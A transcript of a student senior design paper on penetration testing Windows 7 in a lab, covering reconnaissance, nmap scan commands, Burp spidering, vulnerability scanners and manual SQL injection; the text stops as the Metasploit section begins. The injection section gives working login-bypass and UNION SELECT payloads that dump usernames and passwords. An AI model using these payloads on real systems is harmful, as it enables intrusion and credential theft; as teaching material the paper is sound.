Pentesting Windows - Computer Science...
Transcript of Pentesting Windows - Computer Science...
![Page 1: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/1.jpg)
![Page 2: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/2.jpg)
1
Pentesting Windows
___________________________________________________________________________________________
Prepared by
Chad Bartusick __________________________________________
In
Partial Fulfillment of the requirements
For
Senior Design – CSC/CTC 492
Department of Computer Science
California State University, Dominguez Hills Fall 2014
Committee Members/Approval
_____________________ ______________________
_______________ Faculty advisor Signature Date
_____________________ ______________________
_______________ Committee member Signature Date
______________________ ______________________ _______________ Committee member Signature Date
Dr. Mohsen Beheshti ______________________ _______________ Department Chair Signature Date
![Page 3: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/3.jpg)
2
Table of Contents
Approval sheet ............................................................................................1
Table of Contents .......................................................................................2
Abstract .......................................................................................................3
Introduction ................................................................................................4
Chapter 1 – Background ...........................................................................5
Section 1.1 – What is penetration testing? ...................................................6
Section 1.2 –Pre-Requisites .........................................................................7
Chapter 2 - Planning and Preparation.........................................................8
Section 2.1 – Directive approach ................................................................9
Section 2.2 - Prior Research and vulnerabilities ........................................10
Chapter 3 – Information Gathering and analysis ......................................11
Section 3.1 – Network Scanning .......................................................... 12-13
Section 3.2 – Webapp Scanning .......................................................... 14-15
Chapter 4- Vulnerability Detection ..........................................................16
Section 4.1 – Host Vulnerability Scanning .......................................... 17-18
Section 4.2 - Webapp Vulnerability Scanning ..................................... 19-20
Section 4.3 – Manual detection ............................................................ 21-23
Chapter 5 – Penetration Attempt ..............................................................24
Section 5.1 – Good ole Metasploit ....................................................... 25-26
Section 5.2 – Webapp penetration and Database dump ....................... 27-28
Chapter 6 – Covering Tracks and Persistence ..........................................29
Section 6.1 - Keep calm…Clear the logs ..................................................30
Section 6.2 – Botnets and Backdoors for Everyone! .................................31
Conclusion ................................................................................................32
Reference…………………………………………………………...……33
Appendix .............................................................. ……………..…….34-40
![Page 4: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/4.jpg)
3
Abstract
In today’s society, people do not fear any intrusion on their computer because they place
their trust in the security of the internet and in the antivirus protection loaded on their personal
computer. Through this paper I will demonstrate how recklessly false this belief is and how
shockingly easy to break into windows 7 computers or servers through multiple points of entries.
The reason of this demonstration is to convey a message to those who are unaware of such
potential threats and for educational purposes. First, I demonstrate how quickly I am able to
break in, and after that I will traverse some different methodologies and the processes
professional penetration testers take on penetration networks or systems. The reason I’m
choosing Windows 7 is because in today’s cooperate world every company uses Windows 7 for
some form of productivity. Linux, another computer operating system, is a major player as well,
but as for entry into a network. I want to find the path of least resistance and Linux tends to be a
bit more robust and secure. In addition to penetrating Windows 7, I will showcase a new tool I’m
developing enumerating user data once a system has been “rooted. This piece of python code
will gather system credentials and establish a simple botnet for later use. My goal is that the
reader understands the serious concern for the lack of security in Windows 7 and how hackers
trying to expand their knowledge in penetration testing gain a broader understanding of entry
points. Hackers consumed by curiosity love to learn and possess ‘personality’ characteristics of
keen problem solving skills and the ability to absorb and retan large amounts of meaningless
details. This information will be their greatest weapon. This research paper will give you the
tools and knowledge to start conducting your own pentest.
![Page 5: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/5.jpg)
4
Introduction
This paper will focus on the main aspects of pentesting windows 7. Within the pentesting
windows 7, I will demonstrate the use of a collection of tools used to help facilitate the attack. A
strong background of the OSI model and how TCP/IP works will help with the understanding of
this paper. Windows is vulnerable in so many ways that I thought I’d present you with a staple
setup example. The example contains a lab of Kali Linux as the attacking system and the victim
system will be Windows 7 with a W.A.M.P(Windows,Apache,MySQL, and PHP) stack. The
victim will host a web app within WAMP called Mutillidae which is a highly vulnerable webapp
with the top 10 O.W.A.S.P (Open Web Application Security Project) vulnerabilities. Mutillidae
will help simulate a web server hosting a variety services that the victim might be facilitating to
customers. Since we are covering most aspects, I will show introductory methods only of
pentesting. The sheer amount of knowledge of webapp exploitation alone would easily exceed
this paper 100 fold. Some example attacks we will conduct will be brut forcing credentials, man
in the middle attacks, sniffing credentials, SQL injection, cross site scripting, stealing sessions,
and exploiting a known service vulnerability.
![Page 6: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/6.jpg)
5
1. Background
First, a little background about myself. I have 2 years of industry experience working as
a security analyst. Most of my projects were security engineering driven. During my two years I
wrote quite a bit of python code and have utilized all the web languages. I contributed to
pentesting of webapp environments and also network pentest.
The history of pentesting started in the 1960s when a timesharing system was comprised.
That system was named AN/FSQ-32. It was that point of time after the break in that researchers
and anylyst decided to begin conducting studies on breaking into systems. The actual term
penetration test was deemed during a conference by a group of individuals from the RAND
Corporation and NSA. This is when the term “Penetration Test” was born. This group warned of
future generations being attacked as the standard input and output was vulnerable to the
malicious logic of humans writing hacking software.
Kali Linux, the attacking distribution was born from a Debian Linux distribution. It was
more formally known as Backtrack in the early 2000s. Kali is a collection of hacking tools.
These tools are the swiss army knife of penetration testing. These tools are on Linux because the
sheer amount of flexibility on Linux overshadows windows. The tools will be disused more in
depth throughout the paper.
Windows 7 the successor to Windows vista, was released in 2009 is the most widely used
operating system on the planet. Over 1000 core developers worked on Windows 7 and it has
above 32 million lines of code, which in turn means more vulnerability. A contributing factor as
to why hackers target Windows is because almost every major corporation uses windows 7 for
productivity.
![Page 7: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/7.jpg)
6
1.1 What is penetration testing?
For most of you reading, I will assume you have some knowledge of what penetration
testing is. If not, penetration testing is the art and science of breaking into a computer
system. The process consists of 5 major steps; each step gets you additional information
about the system. Once the test is conducted, you gather your findings and compile an
intricate report for the customer. The sole purpose of a penetration test is to find and collect
vulnerabilities. It is up the customer whether you go further and start to capitalize on their
systems. That is highly unlikely for most customers usually want a skim of the network for
vulnerabilities or a web app scan. Penetration testers do not fix the actually vulnerabilities,
instead they advise the customers and point them in a direction of remediation. Penetration
testing can be conducted on Windows and Linux as well as Mac. There are three different
types of penetration tests which are white box, gray box, and black box. White box
penetration testing is conducted with full knowledge of the company and its resources. You
might even get access to their source code on some services or applications. With gray
boxing, you learn moderate information about the company however the information you get
may be very powerful. Black boxing consist of no knowledge at all about the company you
are testing. It is the most realistic type of penetration testing as it simulates outside attackers.
I will be conducting a black box simulation but obviously I know all the ins and outs so
technically this is a white box penetration test. Before I begin, I would like to share a couple
quotes for penetration testing that I abide by the first, “Knowledge is power”, Francis Bacon.
This I find true and very important for penetration testing. “The quieter you are, the more you
can hear”, Ram Dass. Which means undetected surveillance is accumulative.
![Page 8: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/8.jpg)
7
1.2 Pre-Requisites
What do you need to know for this paper and demonstration you might ask? Well, you
need to know a tad bit of Linux administration and some shell commands. You also need to
know some Windows administration as well.
Learning penetration testing is quite obscure forcing most, if not all hackers to learn from
other hackers. Pre-requisites are a bit misleading too since a hacker’s true motivation is to
absorb and learn something new. Hackers are consumed with curiosity and love to learn. If
you’re passionate about becoming a full time penetration tester, you need to posses this
characteristic. I will give you some insight on what penetration testers should know or
eventually learn, but for the sake of this paper you only need to know what I listed above.
Most professional penetration testers know a wide variety of skills. These skills include
Windows administration, Linux administration, LDAP, Active Directory, OSI model,TCP/IP,
Packet analysis, radius client/server, TACACS, python or Perl, php, MySQL, Oracle, CMS’s,
and some knowledge about Samba. This list can extend even further as you get more directed
to embedded systems such as routers and wireless hacking. For the most part, a good chuck
of what our skill requires is in that list. Penetration testers often too pick very specific paths;
some may even choose to do reverse engineering of malware or engineering of malware for
penetration purposes. The material above is accessible from books sold to the public and can
be purchased at Amazon or Barnes and Nobel. Knowledge does in fact hold a lot of power.
You realize this power by knowing MySQL queries; for example you can indeed dump out
table data or inject data into the table. Make learning a passion and give it drive through
pursuing security!
![Page 9: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/9.jpg)
8
2. Preparation and planning
The very first step is to get your reporting and documentation organized and ready for
what we are about to find. You may use any tool of your choice but I personally use VIM
text editor for everything, including programming. I have witnessed others using Microsoft
Word. There is a neat tool for both Windows and Linux called Dradis. It is a very exotic tool
that collects data from NMAP and user input as well. This tool organizes everything for you
and can export all the data to most file types. This comes in handy when you are testing a
very large subnet or multiple subnets. When documenting your findings, you need to screen
shot as much as you can. Once you have some screen shots, you must write descriptions.
The screens shots must be POC (proof of concept). Screen shots must essentially tell a story
and show what data was extracted or exploited. For the most part, the customer does not
want solely text as text can be rather boring. List all your IP’s in accordance to the subnets
and list all the credentials in order of their services as well. When documenting individual
host with the vulnerability you need to organize the highest priority vulnerability at the top
and color coated each in descending order such as red then orange then green.
When conducting, you need to have your environment set up. This includes a laptop with
Kali Linux or your favorite distribution, a couple of flash cards, and a wireless dongle with
an attachable antenna. You should have all your tools installed if you wish you use Kali. For
those who are not using Kali, I will explain each tool I am using. If you are a freelance
penetration tester, it is essential to conduct business in a legal and professional manner. If
you are working internally, you should have written authority over the test. The legal
documents will contain a NDA (non-disclosure agreement) outing what is “off limits” for
you to touch in the company system.
![Page 10: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/10.jpg)
9
2.1 Directive Approach
The directive approach is ideal if you can afford it. It consists of a team of penetration
testers. For this type of approach, the team has split operations for testing which can be
highly effective yielding results needed in a short amount of time. Usually, pairs of testers
are assigned to each process of the penetration testing process. For example, two testers will
scan and do reconnaissance and from there they will connect to Dradis which centralizes the
findings. Two other testers would start the vulnerability scans once the first team has found
some additional hosts. Another team of two would then begin exploitation from the findings
of the vulnerability scanning team. The last team of two would be post exploitation and
persistence. The structure is cascading and frees us of time constraints for each individual
group and tester. If there are any false positives within the group, there are more findings
from the prior team still flowing in to the Dradis database. Again Dradis is optional; you can
use any centralized tool you like. I participated on the defending side of this type of approach
during the WRCCDC (Western Region Collegiate Cyber Defense Competition) and you see
waves of scans at first then in a matter of minutes you start to see odd and unusual things
happen amongst your machine which gave our team little time to defend.
The directive approach is maintained by a captain who organizes the entire thing. The
captain will oversee each area and decide if there is a vector in which he wants to focus more
on. This approach Is also ideal for when certain members lack skill in a certain area but excel
in an another. This gives the team a focal point in their prowess. The team can also be remote
and login to attack via if the legal docs are permissible of that action. This gives the team
greater flexibility.
![Page 11: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/11.jpg)
10
2.2 Prior Research and Vulnerabilities.
If you do not know what vulnerabilities are, I will explain. Vulnerabilities are bugs and
faults within the code that range from a variety of things. These vulnerabilities whether it is
input that isn’t contained by length or limits on sequel statements can be used to generate and
exploit. The exploit is written to do one thing, and that is exploiting the target system. There
is code engineered within the exploit to help facilitate the exploitation. The exploit can be
written in a multitude of languages. From there, we develop a payload which launches the
attack and if it contains malicious code to execute. Usually the payload is a reverse shell
which will discuss later.
Researching prior vulnerabilities is a great way to get ahead of the game when pentesting.
If you are going to attack a company or a single party and you know what services they are
renowned for as it would be to your advantage to find the vulnerabilities that exist for the
current services. The company may these vulnerabilities listed on the black market or if you
are late they will have a patch notes area and it will be listed there time stamp. One thing that
may be helpful is to find a pattern with existing services. If they tend to have a lot of custom
services, you may want to scan it the upper region of the port numbers beyond the well
known ports (1-1024).
Vulnerabilities exist for a short time also called ZERO day which is the day the exploits
are discovered. There is a limited amount of time to use that exploit on top system before
they are patched. An easy but very useful site to use is http://exploit-db.com. This site
contains a list of up-to-date exploits that are ready to use on zero and within weeks to pass on
existing systems. Zero day is a very happy for pentesters.
![Page 12: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/12.jpg)
11
3. Information Gathering and Analysis
We begin our Journey with the first step, “Information Gathering” also called
reconnaissance. Since there are a total of five steps listed in some sources, I am going to
combine reconnaissance with scanning.
I will start off with a proper definition for reconnaissance. It is as follows; “The first and
most important step in an attack involves finding out as much information as possible about
the TOE (Target of Evaluation). If a passive information gathering approach is taken it will
not raise any alarms. Patience and creativity are also a necessity as this can be the longest
phase of the attack.” (DeFino 6).
The proper definition of scanning and reconnaissance from the book, “Official Certified
Ethical Hacker Review Guide” by Steven DeFino states that “The goal of scanning is to learn
as much technical data about the systems as possible. Live host are found and the network is
foot printed. The access points on each live host are determined. Finally, the services that are
available are confirmed and the operating systems of each platform are verified. Polices and
user information is gathered and, finally vulnerabilities are assessed.”(DeFino. et al 6).
One thing to mention of past experience is even though the first phase maybe the longest,
it certainly can be the fastest if you hit the target the right time and gather what you need for
easy access. However, most of the time it is the longest phase. There is two more
vulnerability databases I need to mention and those are http://cve.mitre.org and
http://osvdb.org. Both these are the most prominent vulnerability databases around.
![Page 13: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/13.jpg)
12
3.1 Network Scanning
A small tool and easy discovery for passive reconnaissance is a tool called “Discover-
Scripts”. These tools will literally fetch and retrieve most of the passive reconnaissance
items. It will save you loads of time when you can be discovering other easy to obtain items.
“The Hacker Playbook” by Peter Kim states, “This tool automates a lot of different searches
in one tool. For example, it can search people within that organization or domains on all the
common harvesting sites (e.g. LinkedIn), use common domain tools (e.g. goofile, goog-mail,
theHarvester, search_email_collector, mydnstools) and link 3rd party tools to perform
additional searching.”(Kim 21)
After briefly going over reconnaissance, I want to move on to scanning. Nmap (Network
Mapper) is the most popular tool for actively scanning networks. “Nmap Netowrk Scanning”
by “Gordon Fyodor Lyon” states, “Nmap (“Network Mapper”) is a free and open source
utility for network exploration and security auditing.”(Lyon xxi). In an extension to this
description his says, “ Nmap uses raw IP packets in novel ways to determine what hosts are
available on the network, what services (application name and version) those host is offering,
what operating systems (and OS versions) are running, and what type of packet
filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly
scan large networks, but works fine against single host.”(Lyon xxi).
The use of Nmap is trivial, I will list some commands and a short scription. This is where
we actively start when pentesting a host or large network. Finding points of interest on single
host or large networks.
![Page 14: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/14.jpg)
13
Try a ping sweep.
nmap –sP –v [target range]
Try a list scan.
Nmap –sL –v [target range]
Try a protocol scan.
Nmap –sO –v [target IP]
Try to verify services.
Nmap –sV –v [target IP]
Try a normal connect scan.
Nmap –sT –v [target IP]
Try a stealth scan.
Nmap –sS –v [target IP]
Try an inverse scan: Xmas.
Nmap –sX –v [target IP]
Try an inverse scan: NULL.
Nmap –sN –v [target IP] (DeFino et al 58)
These findings should be filed sorted and for the next and upcoming phases of attack. I am
assuming you already have knowledge in networking and standard TCP/IP.
![Page 15: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/15.jpg)
14
3.2 Webapp Scanning
Webapp Scanning is essentially web page spidering. The Web Hackers Handbook 2
states, “Various tools can perform automated spidering of websites. These tools can work by
requesting a webpage, parsing it for links to other content, requesting these links and continuing
recursively until no new content is discovered.”(Stuttard et al 74). Spidering is essential to the
discovery of attack vectors. Burp Suite is a great tool to use when mapping a website. The
Hacker Play Book states, “To spider your application, drop into the target tab, site map tab,
right click on the domain you want to spider, and click “Spider this host”. Once the spidering
process is complete, Burp should have a good layout of exactly what the application looks
like.”(Kim 49). Burp Suite Site Map
Figure 19 – Taken from The Hackers Playbook
Some files and folders might not be listed in the spider listing. You may navigate to these
manually if you know them off hand or you can right click site map and click engage tools then
finally click “Discover Content”. If the site has authentication on it you Burp may be configured
to use HTTP - basic auth, HTTP – Disgest Authentication, and Form Based Authentication. The
Web Hackers Handbook gives us a great tip for finding hidden content. “Many web servers
contain a file named robots.txt in the web root that contains a list of URL’S that the site does not
![Page 16: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/16.jpg)
15
want web spiders to visit or search engines to index. Sometimes, this file contains references to
sensitive functionality, which you are certainly interested in spidering. Some spidering tools
designed for attacking web applications check robots.txt file and use all URLs within it as seeds
in the spidering process. In this case, the robots.txt file may be counterproductive to the security
of the web application.”(Stuttard et al 74). This robots.txt is listed in the top domain path e.g.
(www.example.com/robots.txt).
Once you have a general map of the site you should see have a list of good attack vectors.
Some things you’ll be looking for are listed by the Web Hackers Handbook 2
Other , More peripheral application behavior, including off-site links, error
messages, administrative and login functions, and the use of redirects.
The core security mechanisms and how they function – in particular, management
of session state, access controls, and authentication mechanism and supporting
logic (user registration, password change, and account recovery)
All different locations at which the application processes user-supplied input –
every URL, query string parameter, item of POST data, and cookie
The technologies employed on server side, including static and dynamic pages,
the types of request parameters employed, the use of SSL, web server software,
interaction with databases, email systems, and other back-end components
(Stuttard et al 98)
In detail, these items would be quite a bit to cover. These items are the items to look for when
spidering. Take note of the locations and what default value or key pair is listed. Knowing the
server side software is very much important as well.
![Page 17: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/17.jpg)
16
4 Vulnerability Detection
After you gathered you list of IP addresses and subnets containing possibly vulnerable
services etc. You may also have a site map of a possibly badly developed web app you spidered
from na apached server running on a windows 7 host. The next step is to probe and test these
vectors of attack. First The following diagram shows the ratio of Web vulnerabilities.
WEBAPP VULERABILITY RATIO
Figure 5 – from Whitehatsec.com
During the years of early 2000, this was the ratio of software vulnerabilities. Although the
statistics haven’t greatly changed since then, we will not be getting into the actual finding of
vulnerabilities of software and instead the enumeration of existing ones.
SOFTWEAR VULERABILITY RATIO
Figure 1 – from research.microsoft.com
![Page 18: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/18.jpg)
17
4.1 Host Vulnerability Scanning
From the list of IP addresses you might find that some of the you can now start your
vulnerability scanner and scanning single targets or a range of targets from a subnet. When it
comes down to which vulnerability scanner to use, you have three choices. The first choice Open
VAS, is my personal favorite. Open Vas is a free community driven scanner that is updated
from the community and by the community. The setup is rather long and very complex and I
must mention the setup can sometimes break. The next option is Nessus vulnerability scanner.
Nessus is also free but no up-to-date plugins. Plugins in a vulnerability scanner are the mini-
programs that facilitate the detection of the vulnerability. Not having an up-to-date plugin
database will be your downfall. By the way, Nessus charges $1,500 dollars for a single license.
Nexpose is the last option, and they are similar to Nessus in that they limit the features and
plugins as well. They also begin charging around $2,000 dollars for the license. You can see why
I prefer OpenVAS to any other scanner. OpenVAS is usually already installed on Kali linux as
well. They have made the setup seemingly easy from what I’ve heard. For the sake of simplicity
I will explain Nessus and Nexpose since they are both used in commercial environments. The
hacker play book explains, “If time is a large concern, I’ll actually run a profile first to look for
only known exploitable vulnerabilities and a second scan with the default profile. This way, the
first scan will complete in a fraction of the time and contain only critical findings.”(Kim 35). The
GUI’s do not need any explaining as they are all labeled and are pretty straight forward. You
input the IP address or subnet and select additional options for the attack and then launch it.
Some of the scanners do not have a progress bar so be patient. Interrupting the process can
sometimes break the software. Below you will find the first image is Nexpose and the second
image is Nessus.
![Page 19: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/19.jpg)
18
NEXPOSE
Figure 8 – from The Hackers Handbook
NESSUS
Figure 9 – from The Hackers Handbook
These vulnerabilities will be listed with multiple ID numbers to them. For example, some might
have CVE, OSVD, BID, VUPEN. These are ID’s to vulnerability databases.
![Page 20: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/20.jpg)
19
4.2 Webapp Vulnerability Detection
After you have spidered the webapp you cannot use the Burp suite to also probe for
vulnerabilities. My other favorite tools for probing for webapp vulnerabilities are OWASPZap
and W3af. We will talk about Burp suite active scanner. The Hacker play book states, “Once you
feel comfortable that you have identified an adequate portion of the site, you can start attacking
the parameters, request, and looking for vulnerably.”(Kim 52). Kim explains, “This can be done
by right clicking on the parent domain and dropping down to “Actively scan this host” (Image
below).”(Kim 53) BURP SITE MAP
Figure 23 – from The Hacker Play Book
Once the scanner has finished running you will have a listing of potential vulnerabilities on your
webapp. The reason we also spidered it was to give the scanner a FQDN to speed up the process
or else it will scan the entire site which might take quite a bit of time. The results will be on the
left hand side and be in and vertical list. Upon clicking one of the pages, you will see a list of
vulnerabilities associated with that page. You then can click then and evaluate if it is a false
positive or not. For example, the Burp Suit found a XSS vulnerability in the image below.
![Page 21: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/21.jpg)
20
BURP SCANNER
Figure 24 - from The Hacker Play Book
To verify this is not a false positive we click the XSS vuln and copy and paste the URL
with the exact parameters. Once we navigate to that page we find out that XSS exist and there is
a Javascript alert window with the number 1 or any other attribute we specify within the alert
window from the attack. This is just an example as to the many vulnerability detections on
webapps. What is really neat with OWASPZap is the fact that it will do all these things at once if
you just put in the IP address of the site listed with the port number. Although it tends to get
rather slow because of the massive amounts data going back and forth. One of my first bug
hunting books I read as a child was, “Hunting Security Bugs” by Tom Gallagher et al. In the
book they explain the following about finding webapp bugs, “Use a fuzzer. Fuzzing is sometimes
dismissed because its goal is to send random junk to the component being tested. People often
think that this won’t yield great results and that targeted testing will cover these cases.
Surprisingly, fuzzing can find bugs that aren’t discovered through code review and targeted
testing.”(Gallagher 72). Fuzzing is a method of a tool that inputs random characters and number
into the input field hoping the webapp or application will fault and crash. That would signify a
bug and vulnerability.
![Page 22: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/22.jpg)
21
4.3 Manual Detection
Once we have some host found and some services mapped to those host, we are lucky we
will find some web servers namely apache, IIS, or tomcat. These web servers may be mapped if
they are hosting dynamic web content. This dynamic web content could potentially be hosting
vulnerable elements or SQL statements and so on. OWASPZap, Burpsuite and w3af are some of
the best all in one tool for webapp scanning and exploitation. SQL injection can happen on
webapp input such as forms or in POST and GET request. I’m going to focus on the manual
findings on the webapp side. The first major OWASP vulnerability usually in webapps is SQL
injection. “Professional Penetration Testing” by Thomas Wilhelm says, “According to NIST
Special Publication 800-95, SQL injection is a “technique used for manipulating Web services
that send SQL queries to a RDBMS [relational database management system] to alter, insert, or
delete data in a database”(326 Wilhelm). To get everyone acquainted with some vulnerabilities
in SQL queries Wilhelm gives us the example,
SELECT * FROM user_data WHERE last_name = ‘Tom’
(Wilhelm 326)
The next example is what we can additionally add on to the query to make it pass back
everything in the database.
SELECT * FROM user_data WHERE last_name = ‘Tom’ OR ‘1’ =‘1’
(Whilhelm 326)
Since we added the logical OR operator the whether the username was correct or not it would
still return everything. The one thing missing from the end of his quote is “-- -“ which tells the
mysql line to turn to comments after the dashes. So essentially you tell it no to process anything
after that. To put this into a scenario I will explain bypassing a login. The scenario goes as
![Page 23: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/23.jpg)
22
follows; you find out that by placing a “ ‘ “ into the input field of a login form that it displays and
error because the developers didn’t escape known SQL characters. The error displays the current
table and column’s. The Web Application Hackers Handbook 2, by Dafydd Stuttard et al gives
us this example
SELECT * FROM users WHERE username = ‘marcus’ and password = ‘secret’
(Stuttard et al 289)
Stuttard states “For example, if an attacker knows that the username of the application
administrator is admin, he can log in as that user by supplying any password and the following
username “admin’—“.”(Stuttard et al 289).
SELECT * FROM users WHERE username = ‘admin--‘ AND password = ‘foo’
(Stuttard et al 289)
This essentially turns the query into
SELECT * FROM users WHERE username = ‘admin’
(Stuttard et al 289)
The last example is manual extraction of data. From this we have the basics of bypassing and
extracting data. For example if we add a single apostrophe in to a form field we get an error.
Chances are the error might list the table name. From there we can construct our UNION
statement to extract the records from the current table or other tables with the same data type, but
take note this only works for matched number of fields. In order to find out what each fields
respective data type is and how many we can methodically guess by incrementing NULL values
on the UNION statement until we pass with no error message. NULL value is “any” data type.
' UNION SELECT null,null null,null,null -- -
![Page 24: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/24.jpg)
23
Since my demonstration has 5 fields we will us that as an example. After we find out that the
table has five respective fields we can start guessing the data type or extracting current table
data.
'UNION SELECT null,Username,Password,null,null from accounts -- -
This will dump out the usernames and passwords from the accounts table. Keep in mind the
statement before the single apostrophe of us abruptly ending it was.
SELECT * FROM accounts where username=’
These are examples are a great way to start a pentest against a windows box. The next step
would be to look into command injection. It’s similar to SQLinjection but a little jagged.
![Page 25: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/25.jpg)
24
5 Penetration Attempt
After we have executed some reconnaissance and found vulnerability, we can start either
brute forcing the victims PC or we can use what we have and start launching attacks via
Metasploit and some other automated tools like SQLmap. When it comes down to this stage you
have to remember there are people on pretesting teams dedicated to just the penetration part.
These individuals are highly trained and usually have a background in system administration or
engineering. The reason for this is that when you finally enter a victims PC you must know how
to navigate and setup additional environmental variables like backdoors. In addition, you also
need the knowledge of disabling startup processes and possibly antivirus as well. If the computer
is part of a domain then it will pay off to be able to exploit that as well if it is poorly set up. For
the next couple of sections I will be on Kali Linux initiating the attack. So brush up on your
Linux!
![Page 26: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/26.jpg)
25
5.1 Penetration Attempt
Metasploit is available on Windows and Linux. I prefer the Linux platform for its
flexibility. The main purpose of Metasploit is to launch attacks on vulnerable services, although
